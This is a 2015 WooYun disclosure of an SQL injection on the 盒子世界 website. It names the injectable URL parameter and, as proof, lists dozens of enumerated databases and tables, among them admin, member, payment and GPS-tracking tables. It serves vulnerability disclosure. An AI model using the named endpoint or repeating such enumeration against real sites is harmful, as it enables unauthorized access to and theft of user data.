漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0108790
漏洞标题:盒子世界存在SQL注入可泄露大量管理信息
相关厂商:盒子世界
漏洞作者: qqdaxingxing
提交时间:2015-04-20 16:41
修复时间:2015-06-04 16:42
公开时间:2015-06-04 16:42
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-04: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
信息泄露简直巨大
详细说明:
http://www.ver.cn/news/news_detail.php?col_id=3234
漏洞证明:
Database: 2shou
[18 tables]
+---------------------------------------+
| phpcars_ad |
| phpcars_admin |
| phpcars_assesscars |
| phpcars_brand |
| phpcars_buycars |
| phpcars_cars |
| phpcars_channel |
| phpcars_filmstrip |
| phpcars_friendlink |
| phpcars_member |
| phpcars_model |
| phpcars_news |
| phpcars_news_category |
| phpcars_page |
| phpcars_page_sorts |
| phpcars_permission |
| phpcars_sellcars |
| phpcars_settings |
+---------------------------------------+
Database: HeziHouse
[54 tables]
+---------------------------------------+
| box_house_gift_0 |
| box_house_gift_1 |
| box_house_gift_2 |
| box_house_gift_3 |
| box_house_gift_4 |
| box_house_gift_5 |
| box_house_gift_6 |
| box_house_gift_7 |
| box_house_gift_8 |
| box_house_gift_9 |
| box_house_item |
| box_house_item_log_0 |
| box_house_item_log_1 |
| box_house_item_log_2 |
| box_house_item_log_3 |
| box_house_item_log_4 |
| box_house_item_log_5 |
| box_house_item_log_6 |
| box_house_item_log_7 |
| box_house_item_log_8 |
| box_house_item_log_9 |
| box_house_room_0 |
| box_house_room_1 |
| box_house_room_2 |
| box_house_room_3 |
| box_house_room_4 |
| box_house_room_5 |
| box_house_room_6 |
| box_house_room_7 |
| box_house_room_8 |
| box_house_room_9 |
| box_house_room_item_0 |
| box_house_room_item_1 |
| box_house_room_item_2 |
| box_house_room_item_3 |
| box_house_room_item_4 |
| box_house_room_item_5 |
| box_house_room_item_6 |
| box_house_room_item_7 |
| box_house_room_item_8 |
| box_house_room_item_9 |
| box_house_store_0 |
| box_house_store_1 |
| box_house_store_2 |
| box_house_store_3 |
| box_house_store_4 |
| box_house_store_5 |
| box_house_store_6 |
| box_house_store_7 |
| box_house_store_8 |
| box_house_store_9 |
| house_room_config |
| item_build_config |
| item_function_config |
+---------------------------------------+
Database: shake
[29 tables]
+---------------------------------------+
| action |
| user |
| action_online |
| action_stat |
| action_text |
| counpon |
| default_text |
| follow |
| joint_action |
| joint_action_join_list |
| joint_action_list |
| joint_action_text |
| last_action |
| message |
| message_user_delete |
| push_notice |
| shop |
| shop_address |
| shop_charge_log |
| shop_charger |
| suggestion |
| sys_admin |
| sys_agent |
| sys_city |
| sys_industry |
| user_check_shop |
| user_ol |
| user_stat |
| wall |
+---------------------------------------+
Database: HeziMark
[16 tables]
+---------------------------------------+
| mark_plant_0 |
| mark_plant_1 |
| mark_plant_2 |
| mark_plant_3 |
| mark_plant_4 |
| mark_plant_5 |
| mark_plant_6 |
| mark_plant_7 |
| mark_plant_8 |
| mark_plant_9 |
| web_activity |
| web_guess |
| web_guess_answer |
| web_member |
| web_sys_role |
| web_sys_user |
+---------------------------------------+
Database: comein
[224 tables]
+---------------------------------------+
| phpcars_ad |
| phpcars_admin |
| phpcars_assesscars |
| phpcars_brand |
| phpcars_buycars |
| phpcars_cars |
| phpcars_channel |
| phpcars_filmstrip |
| phpcars_friendlink |
| phpcars_member |
| phpcars_model |
| phpcars_news |
| phpcars_news_category |
| phpcars_page |
| phpcars_page_sorts |
| phpcars_permission |
| phpcars_sellcars |
| phpcars_settings |
| qb_2shou_buyad |
| qb_2shou_class |
| qb_2shou_collection |
| qb_2shou_comments |
| qb_2shou_config |
| qb_2shou_content |
| qb_2shou_content_1 |
| qb_2shou_db |
| qb_2shou_dianping |
| qb_2shou_field |
| qb_2shou_module |
| qb_2shou_pic |
| qb_2shou_report |
| qb_2shou_sort |
| qb_ad_compete_place |
| qb_ad_compete_user |
| qb_ad_config |
| qb_ad_norm_place |
| qb_ad_norm_user |
| qb_ad_user |
| qb_admin_menu |
| qb_alonepage |
| qb_area |
| qb_city |
| qb_config |
| qb_coupon_config |
| qb_coupon_content |
| qb_coupon_content_1 |
| qb_coupon_field |
| qb_coupon_module |
| qb_coupon_sort |
| qb_crontab |
| qb_dianping_buyad |
| qb_dianping_claim |
| qb_dianping_class |
| qb_dianping_collection |
| qb_dianping_comments |
| qb_dianping_config |
| qb_dianping_content |
| qb_dianping_content_1 |
| qb_dianping_content_2 |
| qb_dianping_content_3 |
| qb_dianping_db |
| qb_dianping_dianping |
| qb_dianping_field |
| qb_dianping_module |
| qb_dianping_pic |
| qb_dianping_report |
| qb_dianping_sort |
| qb_fenlei_buyad |
| qb_fenlei_class |
| qb_fenlei_collection |
| qb_fenlei_comments |
| qb_fenlei_config |
| qb_fenlei_content |
| qb_fenlei_content_1 |
| qb_fenlei_content_13 |
| qb_fenlei_content_14 |
| qb_fenlei_content_2 |
| qb_fenlei_content_3 |
| qb_fenlei_content_4 |
| qb_fenlei_content_5 |
| qb_fenlei_content_6 |
| qb_fenlei_content_7 |
| qb_fenlei_db |
| qb_fenlei_dianping |
| qb_fenlei_field |
| qb_fenlei_module |
| qb_fenlei_pic |
| qb_fenlei_report |
| qb_fenlei_sort |
| qb_form_config |
| qb_form_content |
| qb_form_content_1 |
| qb_form_content_3 |
| qb_form_module |
| qb_form_reply |
| qb_friendlink |
| qb_friendlink_sort |
| qb_gift_config |
| qb_gift_content |
| qb_gift_content_1 |
| qb_gift_content_2 |
| qb_gift_field |
| qb_gift_join |
| qb_gift_module |
| qb_gift_sort |
| qb_group |
| qb_guestbook_config |
| qb_guestbook_content |
| qb_guestbook_sort |
| qb_hack |
| qb_house_buyad |
| qb_house_class |
| qb_house_collection |
| qb_house_comments |
| qb_house_config |
| qb_house_content |
| qb_house_content_1 |
| qb_house_content_2 |
| qb_house_content_3 |
| qb_house_content_4 |
| qb_house_content_5 |
| qb_house_content_6 |
| qb_house_db |
| qb_house_dianping |
| qb_house_field |
| qb_house_module |
| qb_house_pic |
| qb_house_report |
| qb_house_sort |
| qb_hr_apply |
| qb_hr_city |
| qb_hr_collection |
| qb_hr_config |
| qb_hr_content |
| qb_hr_content_1 |
| qb_hr_content_2 |
| qb_hr_field |
| qb_hr_module |
| qb_hr_person |
| qb_hr_sort |
| qb_hy_company |
| qb_hy_company_fid |
| qb_hy_config |
| qb_hy_dianping |
| qb_hy_friendlink |
| qb_hy_guestbook |
| qb_hy_home |
| qb_hy_mysort |
| qb_hy_news |
| qb_hy_pic |
| qb_hy_picsort |
| qb_hy_sort |
| qb_jfabout |
| qb_jfsort |
| qb_label |
| qb_limitword |
| qb_memberdata |
| qb_members |
| qb_menu |
| qb_module |
| qb_moneycard |
| qb_moneylog |
| qb_news_comments |
| qb_news_config |
| qb_news_content |
| qb_news_content_1 |
| qb_news_keyword |
| qb_news_keywordid |
| qb_news_sort |
| qb_olpay |
| qb_pm |
| qb_propagandize |
| qb_purse |
| qb_regnum |
| qb_rmb_consume |
| qb_rmb_getout |
| qb_rmb_infull |
| qb_sell_telephone |
| qb_shop_address |
| qb_shop_collection |
| qb_shop_comments |
| qb_shop_config |
| qb_shop_content |
| qb_shop_content_1 |
| qb_shop_content_2 |
| qb_shop_field |
| qb_shop_join |
| qb_shop_module |
| qb_shop_pic |
| qb_shop_report |
| qb_shop_sort |
| qb_shoptg_collection |
| qb_shoptg_comments |
| qb_shoptg_config |
| qb_shoptg_content |
| qb_shoptg_content_1 |
| qb_shoptg_content_2 |
| qb_shoptg_field |
| qb_shoptg_join |
| qb_shoptg_module |
| qb_shoptg_pic |
| qb_shoptg_purse |
| qb_shoptg_report |
| qb_shoptg_sort |
| qb_street |
| qb_template |
| qb_template_bak |
| qb_tuangou_comments |
| qb_tuangou_config |
| qb_tuangou_content |
| qb_tuangou_content_1 |
| qb_tuangou_content_2 |
| qb_tuangou_field |
| qb_tuangou_join |
| qb_tuangou_module |
| qb_tuangou_report |
| qb_tuangou_sort |
| qb_upfile |
| qb_vote_comment |
| qb_vote_config |
| qb_vote_element |
| qb_vote_topic |
| qb_yzimg |
| qb_zone |
+---------------------------------------+
Database: HeziBlog
[87 tables]
+---------------------------------------+
| blog_action_log |
| blog_allow_timing_box |
| blog_article |
| blog_article_box |
| blog_article_id |
| blog_article_part0 |
| blog_article_part1 |
| blog_article_part2 |
| blog_article_part3 |
| blog_article_part4 |
| blog_article_part5 |
| blog_article_part6 |
| blog_article_part7 |
| blog_banner |
| blog_ccNotify |
| blog_day_log |
| blog_fans |
| blog_fans_detail |
| blog_favorites |
| blog_fresh |
| blog_game |
| blog_game_blogid |
| blog_game_c |
| blog_game_log |
| blog_game_recommend |
| blog_group |
| blog_group_applyjoin |
| blog_group_article_id |
| blog_group_article_part0 |
| blog_group_article_part1 |
| blog_group_article_part2 |
| blog_group_article_part3 |
| blog_group_article_part4 |
| blog_group_article_part5 |
| blog_group_article_part6 |
| blog_group_article_part7 |
| blog_group_game_blogid |
| blog_group_grouper |
| blog_group_hall_relation |
| blog_group_recylce |
| blog_group_team |
| blog_group_team_article |
| blog_group_team_fans |
| blog_group_video_blogid |
| blog_history |
| blog_history_part0 |
| blog_history_part1 |
| blog_history_part2 |
| blog_history_part3 |
| blog_history_part4 |
| blog_history_part5 |
| blog_history_part6 |
| blog_history_part7 |
| blog_image |
| blog_login_log |
| blog_medal |
| blog_notice |
| blog_qq |
| blog_recylce |
| blog_reply |
| blog_reply_belong |
| blog_report |
| blog_retweet |
| blog_search |
| blog_star |
| blog_subject |
| blog_team |
| blog_team_article |
| blog_team_fans |
| blog_team_scene |
| blog_timing_job |
| blog_top_team |
| blog_users |
| blog_users_medal |
| blog_users_part0 |
| blog_users_part1 |
| blog_users_part2 |
| blog_users_part3 |
| blog_users_part4 |
| blog_users_part5 |
| blog_users_part6 |
| blog_users_part7 |
| blog_video |
| blog_video_blogid |
| blog_video_kind |
| blog_video_recommend |
| blog_vote |
+---------------------------------------+
Database: mysql
[25 tables]
+---------------------------------------+
| user |
| box_doodle |
| box_doodleresource |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+
Database: footbal
[3 tables]
+---------------------------------------+
| Sheet1$ |
| Sheet2$ |
| Sheet3$ |
+---------------------------------------+
Database: newver
[39 tables]
+---------------------------------------+
| user |
| aboutus |
| ad |
| adclass |
| alclass |
| authority |
| authority_en |
| authorityclass |
| award |
| click |
| client |
| column_cat |
| columns |
| columns_en |
| columns_en1 |
| columns_en_pic |
| columns_pic |
| contact |
| cyclass |
| dpclass |
| job |
| job_en |
| jobclass |
| links |
| links_en |
| model |
| notdownload |
| note |
| noteuser |
| product |
| product_en |
| productclass |
| site |
| usermodel |
| webinfo |
| works |
| works_en |
| works_en_pic |
| works_pic |
+---------------------------------------+
Database: HeziTT
[20 tables]
+---------------------------------------+
| action |
| user |
| action_online |
| action_stat |
| counpon |
| follow |
| last_action |
| message |
| shop |
| shop_address |
| shop_charge_log |
| shop_charger |
| suggestion |
| sys_admin |
| sys_agent |
| sys_city |
| sys_industry |
| user_ol |
| user_stat |
| wall |
+---------------------------------------+
Database: HeziLand
[7 tables]
+---------------------------------------+
| land_card_info |
| land_card_relation |
| land_info |
| land_relation |
| land_role_box_relation |
| land_role_info |
| land_role_relation |
+---------------------------------------+
Database: HeziStealdream
[4 tables]
+---------------------------------------+
| stealdream_get_gift |
| stealdream_gift |
| stealdream_language |
| stealdream_place |
+---------------------------------------+
Database: HeziFightEx
[13 tables]
+---------------------------------------+
| box_city |
| box_city_fight_log |
| box_city_fight_time |
| city_hall_fight_result |
| city_reward_list |
| fight_capital_camp |
| fight_capital_camp_box |
| hall_abandon_city_log |
| hall_box_city_fight_relation |
| hall_city_fight_statistics |
| hall_city_relation |
| hall_fight_city_log |
| invest_camp_box |
+---------------------------------------+
Database: HeziItem
[9 tables]
+---------------------------------------+
| box_item_basic_info |
| box_item_ext_arm |
| box_item_ext_face |
| box_item_ext_sprite |
| box_item_type |
| plant_bg |
| plant_fruit |
| plant_plant |
| plant_seed |
+---------------------------------------+
Database: love320
[82 tables]
+---------------------------------------+
| dede_cardaddonarticle |
| dede_cardaddonimages |
| dede_cardaddoninfos |
| dede_cardaddonshop |
| dede_cardaddonsoft |
| dede_cardaddonspec |
| dede_cardadmin |
| dede_cardadmintype |
| dede_cardadvancedsearch |
| dede_cardarcatt |
| dede_cardarccache |
| dede_cardarchives |
| dede_cardarcmulti |
| dede_cardarcrank |
| dede_cardarctiny |
| dede_cardarctype |
| dede_cardarea |
| dede_cardchanneltype |
| dede_cardco_htmls |
| dede_cardco_mediaurls |
| dede_cardco_note |
| dede_cardco_onepage |
| dede_cardco_urls |
| dede_carddiyforms |
| dede_carddownloads |
| dede_carderradd |
| dede_cardfeedback |
| dede_cardflink |
| dede_cardflinktype |
| dede_cardfreelist |
| dede_cardhomepageset |
| dede_cardkeywords |
| dede_cardlog |
| dede_cardmember |
| dede_cardmember_company |
| dede_cardmember_feed |
| dede_cardmember_flink |
| dede_cardmember_friends |
| dede_cardmember_group |
| dede_cardmember_guestbook |
| dede_cardmember_model |
| dede_cardmember_msg |
| dede_cardmember_operation |
| dede_cardmember_person |
| dede_cardmember_pms |
| dede_cardmember_snsmsg |
| dede_cardmember_space |
| dede_cardmember_stow |
| dede_cardmember_stowtype |
| dede_cardmember_tj |
| dede_cardmember_type |
| dede_cardmember_vhistory |
| dede_cardmoneycard_record |
| dede_cardmoneycard_type |
| dede_cardmtypes |
| dede_cardmultiserv_config |
| dede_cardmyad |
| dede_cardmytag |
| dede_cardpayment |
| dede_cardplus |
| dede_cardpwd_tmp |
| dede_cardratings |
| dede_cardscores |
| dede_cardsearch_cache |
| dede_cardsearch_keywords |
| dede_cardsgpage |
| dede_cardshops_delivery |
| dede_cardshops_orders |
| dede_cardshops_products |
| dede_cardshops_userinfo |
| dede_cardsoftconfig |
| dede_cardstepselect |
| dede_cardsys_enum |
| dede_cardsys_module |
| dede_cardsys_set |
| dede_cardsys_task |
| dede_cardsysconfig |
| dede_cardtagindex |
| dede_cardtaglist |
| dede_carduploads |
| dede_cardverifies |
| dede_cardvote |
+---------------------------------------+
Database: photo
[12 tables]
+---------------------------------------+
| interp_categories |
| interp_comments |
| interp_contents |
| interp_gimages |
| interp_images |
| interp_mainsettings |
| interp_news |
| interp_sessions |
| interp_tags |
| interp_usergroups |
| interp_users |
| interp_vvc |
+---------------------------------------+
Database: HeziKunta
[14 tables]
+---------------------------------------+
| kunta_config |
| kunta_fight_log |
| kunta_hall |
| kunta_hall_apply |
| kunta_hall_arms |
| kunta_hall_election |
| kunta_hall_fight |
| kunta_hall_member |
| kunta_hall_member_election |
| kunta_hall_member_fight |
| kunta_hall_member_point |
| kunta_hall_treasury |
| kunta_message |
| kunta_treasury |
+---------------------------------------+
Database: HeziCar
[81 tables]
+---------------------------------------+
| box_car_0 |
| box_car_1 |
| box_car_2 |
| box_car_3 |
| box_car_4 |
| box_car_5 |
| box_car_6 |
| box_car_7 |
| box_car_8 |
| box_car_9 |
| box_car_build_0 |
| box_car_build_1 |
| box_car_build_2 |
| box_car_build_3 |
| box_car_build_4 |
| box_car_build_5 |
| box_car_build_6 |
| box_car_build_7 |
| box_car_build_8 |
| box_car_build_9 |
| box_car_garage_0 |
| box_car_garage_1 |
| box_car_garage_2 |
| box_car_garage_3 |
| box_car_garage_4 |
| box_car_garage_5 |
| box_car_garage_6 |
| box_car_garage_7 |
| box_car_garage_8 |
| box_car_garage_9 |
| box_car_match_challenge_0 |
| box_car_match_challenge_1 |
| box_car_match_challenge_2 |
| box_car_match_challenge_3 |
| box_car_match_challenge_4 |
| box_car_match_challenge_5 |
| box_car_match_challenge_6 |
| box_car_match_challenge_7 |
| box_car_match_challenge_8 |
| box_car_match_challenge_9 |
| box_car_match_rally_0 |
| box_car_match_rally_1 |
| box_car_match_rally_2 |
| box_car_match_rally_3 |
| box_car_match_rally_4 |
| box_car_match_rally_5 |
| box_car_match_rally_6 |
| box_car_match_rally_7 |
| box_car_match_rally_8 |
| box_car_match_rally_9 |
| box_car_park_0 |
| box_car_park_1 |
| box_car_park_2 |
| box_car_park_3 |
| box_car_park_4 |
| box_car_park_5 |
| box_car_park_6 |
| box_car_park_7 |
| box_car_park_8 |
| box_car_park_9 |
| box_car_props_0 |
| box_car_props_1 |
| box_car_props_2 |
| box_car_props_3 |
| box_car_props_4 |
| box_car_props_5 |
| box_car_props_6 |
| box_car_props_7 |
| box_car_props_8 |
| box_car_props_9 |
| box_car_train_list |
| build_config |
| car_config |
| car_level_config |
| garage_level_config |
| match_challenge_config |
| match_opponent_config |
| match_rally_config |
| match_result_config |
| park_config |
| props_config |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: shoptest
[14 tables]
+---------------------------------------+
| web_about |
| web_city |
| web_color |
| web_color_type |
| web_department |
| web_express |
| web_info |
| web_member |
| web_member_collect |
| web_member_order |
| web_member_order_detail |
| web_member_receiver |
| web_member_score |
| web_product |
+---------------------------------------+
Database: kis
[21 tables]
+---------------------------------------+
| tb_dept |
| tb_flow |
| tb_flow_action |
| tb_flow_status |
| tb_issue |
| tb_issue_action_user |
| tb_issue_attach |
| tb_issue_comment |
| tb_issue_field |
| tb_issue_log |
| tb_project |
| tb_project_field_edit |
| tb_project_fields |
| tb_project_group |
| tb_project_group_member |
| tb_project_issue_type |
| tb_project_module |
| tb_project_worker |
| tb_query_view |
| tb_role |
| tb_user |
+---------------------------------------+
Database: HeziHi
[14 tables]
+---------------------------------------+
| hi_activity_school_egg |
| hi_activity_school_statistics |
| hi_activity_school_top_list |
| hi_box_modify_pwd_log |
| hi_city_info |
| hi_confirm_mail |
| hi_middle_school |
| hi_primary_school |
| hi_province_info |
| hi_recent_visitor |
| hi_rumour |
| hi_rumour_box |
| hi_security_action_log |
| hi_valid_school |
+---------------------------------------+
Database: HeziShop
[6 tables]
+---------------------------------------+
| shop_goods |
| shop_goods_item_relation |
| shop_goods_sale_info |
| shop_goods_type |
| shop_goods_type_relation |
| shop_info |
+---------------------------------------+
Database: HeziAccount
[41 tables]
+---------------------------------------+
| Sheet1$ |
| account_account |
| account_box_score_0 |
| account_box_score_1 |
| account_box_score_2 |
| account_box_score_3 |
| account_box_score_4 |
| account_box_score_5 |
| account_box_score_6 |
| account_box_score_7 |
| account_box_score_8 |
| account_box_score_9 |
| account_card |
| account_card_need |
| account_card_show |
| account_card_type |
| account_consume_log |
| account_dealer |
| account_dream_packet_log |
| account_gains |
| account_gains_city |
| account_go_day_log |
| account_help |
| account_lyactivity_log |
| account_payment |
| account_payment_error_log |
| account_rate |
| account_resupply_order |
| account_school |
| account_score |
| account_sendGift |
| account_serve_log |
| account_sysconfig |
| account_user_account0 |
| account_users |
| account_users_temp |
| account_zhichong_return_log |
| account_zhongy_return_log |
| temp_gift |
| temp_goods |
| temp_notice |
+---------------------------------------+
Database: guess
[6 tables]
+---------------------------------------+
| web_activity |
| web_guess |
| web_guess_answer |
| web_member |
| web_sys_role |
| web_sys_user |
+---------------------------------------+
Database: gpstracker
[5 tables]
+---------------------------------------+
| Sheet1$ |
| Sheet2$ |
| Sheet3$ |
| gpslocations |
| gpslocations_copy |
+---------------------------------------+
Database: saker
[15 tables]
+---------------------------------------+
| user |
| saker_commentmeta |
| saker_comments |
| saker_download_detail |
| saker_links |
| saker_options |
| saker_postmeta |
| saker_posts |
| saker_term_relationships |
| saker_term_taxonomy |
| saker_terms |
| saker_usermeta |
| saker_users |
| saker_vote |
| saker_vote_detail |
+---------------------------------------+
Database: phpwind
[152 tables]
+---------------------------------------+
| pw_actions |
| pw_activity |
| pw_actmember |
| pw_administrators |
| pw_adminlog |
| pw_adminset |
| pw_advert |
| pw_announce |
| pw_argument |
| pw_attachbuy |
| pw_attachs |
| pw_banuser |
| pw_bbsinfo |
| pw_block |
| pw_buyadvert |
| pw_cache |
| pw_cachedata |
| pw_clientorder |
| pw_cmembers |
| pw_cnalbum |
| pw_cnclass |
| pw_cnphoto |
| pw_colonys |
| pw_comment |
| pw_config |
| pw_creditlog |
| pw_credits |
| pw_customfield |
| pw_datanalyse |
| pw_datastate |
| pw_datastore |
| pw_debatedata |
| pw_debates |
| pw_diary |
| pw_diarytype |
| pw_draft |
| pw_elements |
| pw_extragroups |
| pw_favors |
| pw_feed |
| pw_filter |
| pw_filter_class |
| pw_filter_dictionary |
| pw_filter_record |
| pw_focus |
| pw_forumdata |
| pw_forumlog |
| pw_forummsg |
| pw_forums |
| pw_forumsell |
| pw_forumsextra |
| pw_forumtype |
| pw_friends |
| pw_friendtype |
| pw_hack |
| pw_help |
| pw_invitecode |
| pw_invoke |
| pw_invokepiece |
| pw_ipstates |
| pw_job |
| pw_jober |
| pw_medalinfo |
| pw_medalslogs |
| pw_medaluser |
| pw_membercredit |
| pw_memberdata |
| pw_memberinfo |
| pw_members |
| pw_memo |
| pw_modehot |
| pw_modules |
| pw_mpageconfig |
| pw_msg |
| pw_msgc |
| pw_msglog |
| pw_nav |
| pw_oboard |
| pw_online |
| pw_ouserdata |
| pw_overprint |
| pw_owritedata |
| pw_pcfield |
| pw_pcmember |
| pw_pcvalue1 |
| pw_pcvalue2 |
| pw_permission |
| pw_pidtmp |
| pw_pinglog |
| pw_plan |
| pw_polls |
| pw_postcate |
| pw_posts |
| pw_postsfloor |
| pw_poststopped |
| pw_proclock |
| pw_pushdata |
| pw_pushpic |
| pw_rate |
| pw_rateconfig |
| pw_rateresult |
| pw_recycle |
| pw_report |
| pw_reward |
| pw_schcache |
| pw_setform |
| pw_share |
| pw_sharelinks |
| pw_singleright |
| pw_smiles |
| pw_sqlcv |
| pw_stamp |
| pw_stopic |
| pw_stopicblock |
| pw_stopiccategory |
| pw_stopicpictures |
| pw_stopicunit |
| pw_styles |
| pw_tagdata |
| pw_tags |
| pw_task |
| pw_threads |
| pw_tmsgs |
| pw_toollog |
| pw_tools |
| pw_topiccate |
| pw_topicfield |
| pw_topicmodel |
| pw_topictype |
| pw_topicvalue1 |
| pw_topicvalue2 |
| pw_topicvalue3 |
| pw_topicvalue4 |
| pw_topicvalue5 |
| pw_topicvalue6 |
| pw_topicvalue7 |
| pw_topicvalue8 |
| pw_tpl |
| pw_tpltype |
| pw_trade |
| pw_tradeorder |
| pw_ucapp |
| pw_ucnotify |
| pw_ucsyncredit |
| pw_userapp |
| pw_userbinding |
| pw_usercache |
| pw_usergroups |
| pw_usertool |
| pw_voter |
| pw_windcode |
| pw_wordfb |
+---------------------------------------+
Database: podcast
[24 tables]
+---------------------------------------+
| pod_commentmeta |
| pod_comments |
| pod_links |
| pod_options |
| pod_postmeta |
| pod_posts |
| pod_term_relationships |
| pod_term_taxonomy |
| pod_terms |
| pod_usermeta |
| pod_users |
| podcast_commentmeta |
| podcast_comments |
| podcast_links |
| podcast_options |
| podcast_podpress_statcounts |
| podcast_podpress_stats |
| podcast_postmeta |
| podcast_posts |
| podcast_term_relationships |
| podcast_term_taxonomy |
| podcast_terms |
| podcast_usermeta |
| podcast_users |
+---------------------------------------+
Database: huhu
[25 tables]
+---------------------------------------+
| huhu_commentmeta |
| huhu_comments |
| huhu_links |
| huhu_options |
| huhu_podpress_statcounts |
| huhu_podpress_stats |
| huhu_postmeta |
| huhu_posts |
| huhu_term_relationships |
| huhu_term_taxonomy |
| huhu_terms |
| huhu_usermeta |
| huhu_users |
| wp_weixin |
| wx_alipay_list |
| wx_alipay_server |
| wx_buyhuhu |
| wx_content |
| wx_question |
| wx_replay |
| wx_userinfo |
| wx_userquestion |
| wx_vote_list |
| wx_vote_record |
| wx_vote_usercontent |
+---------------------------------------+
Database: HeziBread
[18 tables]
+---------------------------------------+
| box_adorn |
| box_adorn_buylog |
| box_bread_adorn |
| box_bread_pack |
| box_bread_pack_reply |
| box_bread_packdata |
| box_bread_recommend |
| box_bread_recylce |
| box_bread_reply |
| box_bread_temp |
| box_bread_users |
| box_bread_video |
| box_bread_word |
| box_breads |
| box_breads_icebox |
| box_browse_history |
| box_report |
| box_search_word |
+---------------------------------------+
Database: HeziBackup
[93 tables]
+---------------------------------------+
| box_action_log_slave1_201107 |
| box_action_log_slave1_201109 |
| box_action_log_slave2_201107 |
| box_action_log_slave3_201107 |
| box_action_log_slave4_201107 |
| box_passport_list_slave1_201107 |
| box_passport_list_slave1_201109 |
| box_passport_list_slave2_201107 |
| box_passport_list_slave2_201109 |
| box_passport_list_slave3_201107 |
| box_passport_list_slave3_201109 |
| box_passport_list_slave4_201107 |
| box_passport_list_slave4_201109 |
| msg_box_action_0_msg_201109 |
| msg_box_action_10_msg_201109 |
| msg_box_action_11_msg_201109 |
| msg_box_action_12_msg_201109 |
| msg_box_action_13_msg_201109 |
| msg_box_action_14_msg_201109 |
| msg_box_action_15_msg_201109 |
| msg_box_action_16_msg_201109 |
| msg_box_action_17_msg_201109 |
| msg_box_action_18_msg_201109 |
| msg_box_action_19_msg_201109 |
| msg_box_action_1_msg_201109 |
| msg_box_action_2_msg_201109 |
| msg_box_action_3_msg_201109 |
| msg_box_action_4_msg_201109 |
| msg_box_action_5_msg_201109 |
| msg_box_action_6_msg_201109 |
| msg_box_action_7_msg_201109 |
| msg_box_action_8_msg_201109 |
| msg_box_action_9_msg_201109 |
| msg_box_chat_0_msg_201109 |
| msg_box_chat_10_msg_201109 |
| msg_box_chat_11_msg_201109 |
| msg_box_chat_12_msg_201109 |
| msg_box_chat_13_msg_201109 |
| msg_box_chat_14_msg_201109 |
| msg_box_chat_15_msg_201109 |
| msg_box_chat_16_msg_201109 |
| msg_box_chat_17_msg_201109 |
| msg_box_chat_18_msg_201109 |
| msg_box_chat_19_msg_201109 |
| msg_box_chat_1_msg_201109 |
| msg_box_chat_2_msg_201109 |
| msg_box_chat_3_msg_201109 |
| msg_box_chat_4_msg_201109 |
| msg_box_chat_5_msg_201109 |
| msg_box_chat_6_msg_201109 |
| msg_box_chat_7_msg_201109 |
| msg_box_chat_8_msg_201109 |
| msg_box_chat_9_msg_201109 |
| msg_box_friend_0_msg_201109 |
| msg_box_friend_10_msg_201109 |
| msg_box_friend_11_msg_201109 |
| msg_box_friend_12_msg_201109 |
| msg_box_friend_13_msg_201109 |
| msg_box_friend_14_msg_201109 |
| msg_box_friend_15_msg_201109 |
| msg_box_friend_16_msg_201109 |
| msg_box_friend_17_msg_201109 |
| msg_box_friend_18_msg_201109 |
| msg_box_friend_19_msg_201109 |
| msg_box_friend_1_msg_201109 |
| msg_box_friend_2_msg_201109 |
| msg_box_friend_3_msg_201109 |
| msg_box_friend_4_msg_201109 |
| msg_box_friend_5_msg_201109 |
| msg_box_friend_6_msg_201109 |
| msg_box_friend_7_msg_201109 |
| msg_box_friend_8_msg_201109 |
| msg_box_friend_9_msg_201109 |
| msg_public_chat_0_msg_201109 |
| msg_public_chat_10_msg_201109 |
| msg_public_chat_11_msg_201109 |
| msg_public_chat_12_msg_201109 |
| msg_public_chat_13_msg_201109 |
| msg_public_chat_14_msg_201109 |
| msg_public_chat_15_msg_201109 |
| msg_public_chat_16_msg_201109 |
| msg_public_chat_17_msg_201109 |
| msg_public_chat_18_msg_201109 |
| msg_public_chat_19_msg_201109 |
| msg_public_chat_1_msg_201109 |
| msg_public_chat_2_msg_201109 |
| msg_public_chat_3_msg_201109 |
| msg_public_chat_4_msg_201109 |
| msg_public_chat_5_msg_201109 |
| msg_public_chat_6_msg_201109 |
| msg_public_chat_7_msg_201109 |
| msg_public_chat_8_msg_201109 |
| msg_public_chat_9_msg_201109 |
+---------------------------------------+
Database: datacenter
[1 table]
+---------------------------------------+
| box_chat |
+---------------------------------------+
Database: HeziApp
[15 tables]
+---------------------------------------+
| book_banner |
| book_book |
| book_toys |
| box_doodle |
| box_doodleresource |
| box_ebook |
| box_ebookbox |
| box_ebookgroup |
| box_ebookimages |
| box_ebookrecyclebin |
| box_vote_other |
| box_vote_question |
| box_vote_select |
| box_vote_subject |
| box_vote_users |
+---------------------------------------+
Database: license
[52 tables]
+---------------------------------------+
| license_admin |
| license_apply |
| license_area |
| license_brand |
| license_channel |
| license_checktype |
| license_conf |
| license_contract |
| license_contract_channel |
| license_contract_commison |
| license_contract_copy |
| license_contract_payment |
| license_contract_product |
| license_contract_salereport |
| license_currency |
| license_exchange |
| license_exchange_dialog |
| license_exchange_gallery |
| license_licenser |
| license_licenser_group |
| license_log |
| license_nav |
| license_paytype |
| license_picclass |
| license_picdetail |
| license_picdetail_detail |
| license_picture |
| license_picture_access |
| license_pictype |
